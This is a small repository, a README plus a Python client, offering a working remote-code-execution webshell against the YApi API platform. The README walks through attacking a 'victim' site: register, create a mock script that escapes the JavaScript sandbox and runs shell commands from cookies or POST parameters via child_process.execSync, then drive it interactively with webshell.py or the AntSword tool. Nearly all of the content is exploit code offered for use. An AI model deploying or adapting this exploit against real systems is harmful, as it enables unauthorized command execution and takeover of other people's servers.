├── README.md └── webshell.py /README.md: -------------------------------------------------------------------------------- 1 | # yapi-rce-webshell 2 | Yapi mock script RCE another version. Webshell way. 3 | 4 | https://github.com/YMFE/yapi/issues/2099 5 | 6 | # funny things 7 | 8 | usage: 9 | 10 | 1. victim yapi website 11 | 2. register account 12 | 3. craete project and create api in it 13 | 4. create mock script like 14 | ```js 15 | const sandbox = this 16 | const ObjectConstructor = this.constructor 17 | const FunctionConstructor = ObjectConstructor.constructor 18 | const myfun = FunctionConstructor('return process') 19 | const process = myfun() 20 | mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString() 21 | // you can also add exec function to do some async jobs like running enum scripts 22 | ``` 23 | 5. use python script to connect webshell and interactive 24 | 25 | ```bash 26 | python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test } -i # interactive mode 27 | # or 28 | python3 webshell.py {mock address like: http://whereisthevictim/mock/222/test/test} {cmd dir,you can use "."} {command location} 29 | ``` 30 | 31 | # AntSword-like Alternative 32 | 33 | 1. Same as usage 34 | 2. But Create an API With Advanced Mock POST Method. 35 | ```js 36 | const sandbox = this 37 | const ObjectConstructor = this.constructor 38 | const FunctionConstructor = ObjectConstructor.constructor 39 | const myfun = FunctionConstructor('return process') 40 | const process = myfun() 41 | mockJson = process.mainModule.require("child_process").execSync(params.data).toString() 42 | // you can also add exec function to do some async jobs like running enum scripts 43 | ``` 44 | 3. Open AntSword 45 | 4. Create with Config like 46 | - Type: CMDLINUX 47 | - Pass: data 48 | - URL: mock url in Yapi config 49 | - encoder: default 50 | - decoder: base64 51 | 5. enjoy your webshell 52 | -------------------------------------------------------------------------------- /webshell.py: -------------------------------------------------------------------------------- 1 | # Author: Esonhugh 2 | # Date: 2022/5/14 3 | # MockScript Came from: https://github.com/YMFE/yapi/issues/2099 4 | # MockJson = 5 | # const sandbox = this 6 | # const ObjectConstructor = this.constructor 7 | # const FunctionConstructor = ObjectConstructor.constructor 8 | # const myfun = FunctionConstructor('return process') 9 | # const process = myfun() 10 | # mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString() 11 | 12 | import requests 13 | import sys 14 | 15 | targeturl = "" 16 | targetdir = "." 17 | targetcmd = "" 18 | 19 | def main(): 20 | bad_cookie = { 21 | "dir": targetdir, 22 | "cmd": targetcmd, 23 | } 24 | print(bad_cookie) 25 | r = requests.get(targeturl,cookies=bad_cookie) 26 | print(r.text) 27 | 28 | if __name__ == '__main__': 29 | targeturl = sys.argv[1] 30 | targetdir = sys.argv[2] 31 | if targetdir == "-i": 32 | while True: 33 | targetcmd = input("Command:") 34 | if targetcmd.split(" ")[0] == "cd": 35 | targetdir = targetcmd[2:] 36 | main() 37 | else: 38 | targetcmd = " ".join(sys.argv[3:]) 39 | main() 40 | --------------------------------------------------------------------------------